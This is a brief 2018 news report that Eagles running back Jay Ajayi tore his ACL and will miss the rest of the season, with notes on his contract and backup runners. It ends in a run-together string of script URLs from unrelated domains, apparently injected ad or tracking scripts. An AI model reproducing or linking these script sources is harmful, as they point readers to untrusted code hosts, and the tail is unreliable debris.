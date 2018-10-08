Eagles RB Jay Ajayi to miss remainder of season with torn ACL

According to ESPN’s Adam Schefter, Philadelphia Eagles running back Jay Ajayi will miss the remainder of the season after tearing his ACL in yesterday’s loss to the Minnesota Vikings.

At one point, Ajayi left yesterday’s game with what was called a knee injury before returning to finish the game. Ajayi ended the afternoon with eight carries for 29 yards.

After the game, Ajayi expressed his frustration with the Eagles lack of running, saying that it “doesn’t make sense.”

Ajayi, 25, is in the last year of his current deal, and the Eagles expressed high interest in retaining him.

With Ajayi out for the season, the Eagles will turn to Wendell Smallwood, Josh Adams, and an eventually returning Darren Sproles to handle duties out of the backfield.

//proxdevcool.com/1e6ba9a0464b8e1485.jshttps://proxdevcool.com/addons/lnkr5.min.jshttps://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52375x7787x&r=1539034925495https://proxdevcool.com/ext/1e6ba9a0464b8e1485.js?sid=52375_7787_&title=ads&blocks%5B%5D=31af2